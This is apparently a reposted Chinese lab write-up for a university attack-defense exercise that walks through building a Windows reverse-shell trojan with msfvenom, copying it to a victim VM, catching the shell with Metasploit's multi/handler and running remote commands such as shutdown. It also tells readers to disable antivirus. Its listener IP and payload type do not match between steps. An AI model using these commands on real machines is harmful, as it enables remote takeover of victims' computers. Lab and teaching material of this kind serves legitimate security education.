木马病毒制作及分析

这篇具有很好参考价值的文章主要介绍了木马病毒制作及分析。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

  • 实验目的

本次实验为考核实验,需要独立设计完成一次网络攻防的综合实验。设计的实验中要包括以下几个方面内容:

(1) 构建一个具有漏洞的服务器,利用漏洞对服务器进行入侵或攻击;

(2) 利用网络安全工具或设备对入侵与攻击进行检测;

注意事项

1.本病毒程序用于实验目的,面向实验演示,侧重于演示和说明病毒的内在原理,破坏功能有限。在测试病毒程序前,需先关闭杀毒软件的自动防护功能或直接关闭杀毒软件。

2.若在个人电脑上实验,最好在虚拟机中运行。

3.测试完毕后,请注意病毒程序的清除,以免误操作破坏计算机上的其他程序。

4.请勿传播该木马。传播该病毒造成有用数据丢失、电脑故障甚至触犯法律等后果,由传播者负责。

  • 实验要求

Windows系统 、kalilinux系统、vmware等

  • 实验内容

    利用kali 生成木马并执行,攻击机kali的ip地址192.168.6.50 ,受害机的server ip地址192.168.6.100.

   参考如图:

    木马病毒制作及分析

四、实验步骤

1、使用kali生成木马,木马程序名nxlgwg.exe

   root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.43.25  LPORT=4444  -f  exe > nxlgwg.exe

操作截图

木马病毒制作及分析

检查/root/目录下是否生成木马

操作截图

木马病毒制作及分析木马病毒制作及分析 

2、将生成的木马程序名拷贝到受害机上 (方法很多,可以使用putty或者WISCP)也可利用虚拟与主机之间可以复制文件进行文件copy。

操作截图

将其拷贝出来,将其复制到server主机之上。

木马病毒制作及分析

3、在kali系统中实施攻击,调用MSF工具进行攻击

打开 Metasploit 工具,直接搜索即可。

木马病毒制作及分析

参照上图选择工具

然后依次输入以下命令

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.6.50
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

木马病毒制作及分析 

输入shell 等待受害机点击木马

木马病毒制作及分析

操作截图

  1. 确认受害机被远程控制

通过 kail 进行攻击   

 在受害机桌面上建立文件夹(使用mkdir命令建立任一文件夹)

操作截图

 木马病毒制作及分析

木马病毒制作及分析

对受害机进行设定60秒关机操作(shutdown –s –t 60)

木马病毒制作及分析

木马病毒制作及分析  

取消关机操作 shutdown –a

木马病毒制作及分析

核查受害机的任务进程,确认木马正在运行

操作截图

木马病毒制作及分析

核查受害机当前端口打开情况(使用netstat 命令检查4444端口被打开)

操作截图

木马病毒制作及分析文章来源地址https://www.toymoban.com/news/detail-464810.html

到了这里,关于木马病毒制作及分析的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 计算机病毒,蠕虫,木马三者之间的区别

    病毒、蠕虫和木马是可导致计算机和计算机上的信息损坏的恶意程序。 根据《中华人民共和国计算机信息系统安全保护条例》,病毒的明确定义是“指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序

    2023年04月14日
    浏览(42)
  • 服务器病毒木马通用排查处理应急响应流程

    目录 一、勒索病毒发作的特征    二、勒索病毒的应急响应   三、勒索病毒预防与事后加固   如果发现大量统一后缀的文件;发现勒索信在Linux/home、/usr等目录,在Windows   桌面或者是被加密文件的文件夹下。如果存在以上特征情况,证明感染了勒索病毒并且已经发作。

    2024年04月22日
    浏览(40)
  • 记一次“XMR门罗币挖矿木马病毒”处置

    故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。 市面上存在很多关于XMR门罗币挖矿的教程,这些教程可能会被攻击者恶

    2024年04月22日
    浏览(48)
  • 网络攻击1——网络安全基本概念与终端安全介绍(僵尸网路、勒索病毒、木马植入、0day漏洞)

    目录 网络安全的基本术语 黑客攻击路径 终端安全 僵尸网络 勒索病毒 挖矿病毒 宏病毒 木马的植入 0day漏洞 流氓/间谍软件 网络安全的定义(CIA原则) 数据的保密性Confidentiality(对称/非对称秘钥) 完整性Integrity(数字证书—证明发送方可信、数字签名—验证数据完整性,是

    2024年02月03日
    浏览(49)
  • stm32嵌入式实验考核

    STM32 实验考核题目 1. 利用 STM32 小板实现:控制外接 LED 灯每隔 3 秒钟亮暗变换,同 时在 PC 机上显示 MCU 的计时时间,MCU 的初始时间由 PC 机 方设置。 2. 利用 STM32 小板实现:利用导线外接 GPIO 口模拟 2 个按键输入, 根据输入组合的四种情况,分别控制三色灯四种流水灯效果

    2024年02月03日
    浏览(52)
  • 灰鸽子--木马、后门实验

    目录 实验目的 实验要求  实验原理  实验环境  实验步骤 实验目的         1.了解 木马攻击的原理 。         2. 掌握木马与后门工作机制         3. 掌握木马与后门的防范措施 实验要求 利用灰鸽子客户端配置服务器程序并生成服务端 配置并生成服务器 进行木

    2024年02月10日
    浏览(45)
  • msfconsole之制作windows木马并成功获取shell

    一、工具简介     msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如

    2023年04月08日
    浏览(30)
  • 利用python制作简单勒索病毒

    前置 加密 解密 可以使用python打包的扩展包变成.exe文件进行尝试

    2024年02月07日
    浏览(42)
  • 特殊符号的制作 台风 示例 使用第三方工具 Photoshop 地理信息系统空间分析实验教程 第三版

      首先这是一个含有字符的,使用arcgis自带的符号编辑器制作比较困难。所以我们准备采用Adobe Photoshop 来进行制作符号,然后直接导入符号的图片文件作为符号 我们打开ps,根据上面的图片的像素长宽比,设定合适的高度和宽度  【高度】设置为335px,【宽度】设置为283px 根

    2024年02月14日
    浏览(58)
  • 漏测分析的目的

    漏测分析的目的 漏测分析是软件测试过程中的一项重要工作,旨在识别和分析测试工作中可能存在的遗漏或疏漏,从而进一步提高软件质量和可靠性。 漏测分析的主要目的是找出未被覆盖的测试用例,即未能被测试到的功能或者代码路径。通过漏测分析,可以检测到测试用

    2024年02月05日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包